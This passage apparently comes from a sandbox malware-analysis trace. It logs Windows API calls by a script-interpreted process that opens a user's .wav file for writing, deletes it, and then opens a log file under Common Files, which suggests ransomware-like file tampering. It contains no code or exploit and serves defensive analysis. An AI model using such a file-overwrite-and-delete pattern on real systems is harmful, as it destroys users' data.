HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc621f80, ftCreationTime.dwHighDateTime=0x1d5ddf6, ftLastAccessTime.dwLowDateTime=0xe95e1f50, ftLastAccessTime.dwHighDateTime=0x1d5e5c7, ftLastWriteTime.dwLowDateTime=0xe95e1f50, ftLastWriteTime.dwHighDateTime=0x1d5e5c7, nFileSizeHigh=0x0, nFileSizeLow=0xa7a0, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="v6HGG6Br4L.wav", cAlternateFileName="V6HGG6~1.WAV")) returned 0x90ae18 [0188.118] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0188.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0188.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0188.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0188.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0188.118] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.118] CharLowerBuffW (in: lpsz="byte[42912]", cchLength=0xb | out: lpsz="byte[42912]") returned 0xb [0188.118] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.118] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0188.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0188.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0188.118] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.118] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0188.118] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0188.119] FreeLibrary (hLibModule=0x75c90000) returned 1 [0188.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0188.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0188.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0188.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0188.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0188.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0188.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0188.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0188.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0188.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0188.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0188.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0188.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0188.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0188.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0188.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0188.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0188.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0188.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0188.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0188.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0188.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0188.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0188.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0188.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0188.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0188.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0188.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0188.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0188.120] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.120] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.120] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.120] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0188.120] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.120] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.120] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.120] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.120] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.120] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.120] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.120] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.120] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.120] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.120] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.120] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.120] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.121] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.121] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.121] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.121] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0188.121] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.121] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\v6hgg6br4l.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0188.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0188.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0188.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0188.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0188.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0188.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0188.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0188.121] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.121] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0188.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0188.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0188.122] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0188.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0188.122] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0188.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0188.122] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0188.122] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0188.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0188.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0188.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0188.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0188.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0188.122] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0188.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0188.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0188.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0188.122] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0188.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0188.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0188.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bd648 [0188.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd648, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0188.123] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.123] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0188.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0188.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0188.123] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0188.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0188.123] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0188.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0188.124] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0188.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0188.124] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0188.124] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0188.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0188.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0188.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0188.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0188.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0188.124] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0188.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0188.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0188.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0188.124] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0188.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0188.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0188.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba2e8 [0188.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba2e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0188.125] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.125] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0188.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0188.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0188.125] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0188.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0188.125] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0188.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0188.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0188.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0188.125] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav", lpFilePart=0x0) returned 0x44 [0188.125] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc621f80, ftCreationTime.dwHighDateTime=0x1d5ddf6, ftLastAccessTime.dwLowDateTime=0xe95e1f50, ftLastAccessTime.dwHighDateTime=0x1d5e5c7, ftLastWriteTime.dwLowDateTime=0x155ab920, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xa7a0, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="v6HGG6Br4L.wav", cAlternateFileName="V6HGG6~1.WAV")) returned 0x90ae18 [0188.125] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\v6hgg6br4l.wav")) returned 1 [0188.127] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc621f80, ftCreationTime.dwHighDateTime=0x1d5ddf6, ftLastAccessTime.dwLowDateTime=0xe95e1f50, ftLastAccessTime.dwHighDateTime=0x1d5e5c7, ftLastWriteTime.dwLowDateTime=0x155ab920, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xa7a0, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="v6HGG6Br4L.wav", cAlternateFileName="V6HGG6~1.WAV")) returned 0 [0188.127] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0188.130] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.131] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0188.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0188.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0188.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0188.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0188.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0188.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0188.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0188.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0188.131] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0188.131] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0188.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0188.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0188.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0188.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0188.132] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0188.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0188.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0188.132] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0188.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0188.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0188.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0188.132] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0188.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0188.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0188.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0188.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0188.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0188.132] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0188.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0188.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0188.132] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0188.132] SetFilePointerEx 